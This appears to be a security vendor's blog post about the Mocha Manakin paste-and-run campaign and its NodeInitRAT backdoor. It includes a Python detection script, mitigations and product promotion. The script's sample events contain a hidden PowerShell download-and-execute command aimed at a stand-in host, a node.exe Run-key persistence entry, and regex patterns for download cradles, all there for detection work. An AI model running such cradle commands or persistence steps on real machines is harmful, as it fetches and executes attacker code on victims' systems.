Mocha Manakin Attack Detection: Hackers Spread a Custom NodeJS Backdoor Dubbed NodeInitRAT Using the Paste-and-Run Technique
Mocha Manakin, believed to have ties to Interlock ransomware operations, has been observed using the paste-and-run phishing technique for initial access since at least January 2025. Adversaries deploy a custom NodeJS backdoor, dubbed NodeInitRAT, which enables persistence, reconnaissance, command execution, and payload delivery via HTTP, along with other offensive operations that can potentially lead to ransomware attacks.
Detect Mocha Manakin Paste-and-Run Attacks
Cybersecurity experts have long tracked how malicious actors leverage PowerShell to install backdoors, execute harmful scripts, and pursue offensive objectives within the organization’s infrastructure. The ongoing struggle between attackers, defenders, and security analysts continues to resemble a game of cat and mouse. PowerShell’s flexibility makes it indispensable for system admins, but equally attractive to adversaries, complicating detection efforts and making it a priority for defensive measures. In its latest campaign, Mocha Manakin uses a paste-and-run initial access technique via PowerShell to deliver a tailored NodeJS backdoor called NodeInitRAT, a threat that might escalate to ransomware, amplifying the risk for affected organizations.
Register for SOC Prime Platform to get a relevant set of Sigma rules for Mocha Manakin activity, powered by a complete product suite for AI-powered detection engineering, automated threat hunting, and advanced threat detection. Click the Explore Detections button and reach the curated set of SOC content for proactive cyber defense.
All the detection algorithms can be used across dozens of industry-leading SIEM, EDR, and Data Lake solutions and are aligned with MITRE ATT&CK® to accelerate threat research and assist security teams in their day-to-day SOC operations. Each Sigma rule is enriched with relevant metadata, such as CTI links, attack timelines, audit configurations, triage recommendations, and more helpful references to equip defenders with comprehensive threat context.
What is Mocha Manakin: Latest Attack Analysis
Red Canary researchers have been observing Mocha Manakin activity since January 2025 as part of a broader set of adversary clusters that leverage paste-and-run for initial access. Also known as ClickFix or fake CAPTCHA, this offensive method deceives users into running a script that retrieves additional payloads from attacker-controlled infrastructure. This gives attackers an opening to deploy diverse malicious samples, such as LummaC2, HijackLoader, Vidar, and others.
This adversary method has remained consistently prevalent and expanded in usage since August 2024. Its sustained popularity is largely due to its effectiveness in deceiving users into running harmful scripts on their devices. The versatility of paste-and-run lures, distributed through phishing emails, malicious browser injections, and more, enables adversaries to present these deceptive prompts to potential victims.
However, Mocha Manakin stands out from other similar campaigns due to its deployment of a customized NodeJS-based backdoor dubbed NodeInitRAT. The latter enables threat actors to maintain persistent access and conduct reconnaissance operations, including enumerating user principals and collecting domain-specific information. NodeInitRAT communicates via HTTP with attacker-operated servers, often relayed through Cloudflare tunnels to mask infrastructure. It can execute arbitrary commands and deliver additional malware samples to infected hosts.
Mocha Manakin shares several operational characteristics with Interlock ransomware campaigns, including the use of paste-and-run techniques for initial access, deploying the NodeInitRAT backdoor as a secondary payload, and reusing portions of the same attacker infrastructure. Notably, if left unaddressed, the malicious activity has the potential to escalate into ransomware incidents.
Paste-and-run lures typically fall into two categories: access repair lures, which deceive users into thinking they must fix access to a file or site, and fake CAPTCHA lures, which prompt users to verify they’re human to proceed; both lead to the execution of malicious commands. Once a user clicks the Fix or Verify button within the lure, an obfuscated PowerShell command is silently copied to their clipboard. The lure then instructs them to follow so-called “verification steps,” and when the user pastes and runs the copied command, the compromise begins.
Upon successful execution, Mocha Manakin’s paste-and-run PowerShell command leads to the download and execution of a PowerShell loader. The latter retrieves a ZIP archive containing a legitimate node.exe binary and launches NodeInitRAT by passing the malware’s code via the command line. Once active, NodeInitRAT can establish persistence via a Windows Registry run key, conduct system and domain reconnaissance, communicate with attacker servers over HTTP, run arbitrary commands to enumerate domain controllers, trusts, admins, and SPNs, deploy additional EXE, DLL, and JS payloads, and obfuscate data transfers using XOR encoding and GZIP compression.
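The three behaviours just described (a hidden PowerShell download cradle launched from the Run dialog, node.exe spawned by PowerShell with its script passed inline on the command line, and a Run key pointing at node.exe) can be turned into simple host-telemetry checks. The following Python is an added example written for this post, not code from Red Canary or SOC Prime; the Sysmon-style field names and the sample events are constructed assumptions.

```python
import re

# Constructed Sysmon-style events (process creation and registry set) used as
# sample input for this example; they are not telemetry from the original post.
EVENTS = [
    {"type": "process", "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe", "cmd": "explorer.exe"},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell -w hidden -ep bypass -c \"iwr http://lure.invalid/a|iex\""},
    {"type": "process", "image": r"C:\Users\alice\AppData\Local\Temp\nd\node.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "node.exe -e \"const h=require('http');/*...*/\""},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": r"C:\Users\alice\AppData\Local\Temp\nd\node.exe -e ..."},
    {"type": "process", "image": r"C:\Program Files\nodejs\node.exe",
     "parent": r"C:\Program Files\Microsoft VS Code\Code.exe", "cmd": "node.exe build.js"},
]

POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
CRADLE = re.compile(r"iwr|invoke-webrequest|downloadstring|iex|invoke-expression", re.I)
HIDDEN_OR_BYPASS = re.compile(r"-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass", re.I)
INLINE_JS = re.compile(r"\s(-e|--eval|-p|--print)\s")  # node.exe inline-script switches

def base(path):
    return path.rsplit("\\", 1)[-1].lower()

def rule_paste_and_run(ev):
    # Commands typed into Win+R run as children of explorer.exe; a hidden,
    # policy-bypassing PowerShell with a download cradle from there matches the lure.
    return (ev["type"] == "process" and POWERSHELL.search(ev["image"]) is not None
            and base(ev["parent"]) == "explorer.exe"
            and HIDDEN_OR_BYPASS.search(ev["cmd"]) is not None
            and CRADLE.search(ev["cmd"]) is not None)

def rule_inline_node(ev):
    # node.exe started by PowerShell from a user-writable path with its code on
    # the command line, as the loader does for NodeInitRAT.
    return (ev["type"] == "process" and base(ev["image"]) == "node.exe"
            and POWERSHELL.search(ev["parent"]) is not None
            and INLINE_JS.search(ev["cmd"]) is not None
            and not ev["image"].lower().startswith("c:\\program files"))

def rule_node_run_key(ev):
    # Persistence: a Run key whose value launches node.exe.
    return (ev["type"] == "registry" and "\\currentversion\\run\\" in ev["key"].lower()
            and "node.exe" in ev["value"].lower())

RULES = {"paste_and_run_powershell": rule_paste_and_run,
         "node_inline_script_from_powershell": rule_inline_node,
         "node_run_key_persistence": rule_node_run_key}

def detect(events):
    """Return (rule_name, event_index) pairs for every event a rule fires on."""
    return [(name, i) for i, ev in enumerate(events) for name, rule in RULES.items() if rule(ev)]
```

The legitimate developer launch of node.exe from Program Files by an editor is deliberately left unflagged; tune the path and parent checks to what is normal in your estate before deploying such logic.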
Defending against paste-and-run attacks remains challenging despite the tactic being well-known. Mitigations include disabling Windows hotkeys (e.g., Windows+R/X) via Group Policy to block quick script execution, though adoption is limited because users rely on them. To counter NodeInitRAT, security teams should terminate any suspicious node.exe processes, delete associated payloads such as DLLs, and remove persistence mechanisms. At the network level, defenders are advised to block or sinkhole any C2 domains and IPs tied to NodeInitRAT and to monitor DNS and traffic logs for indicators of compromise.
Given that Mocha Manakin and NodeInitRAT share key characteristics with Interlock ransomware activity, early detection and response are critical. Rely on SOC Prime’s complete product suite backed by AI, automation, and live threat intel to identify cyber attacks at their earliest stages and proactively safeguard your infrastructure, leaving no chance for emerging threats to go undetected on your watch.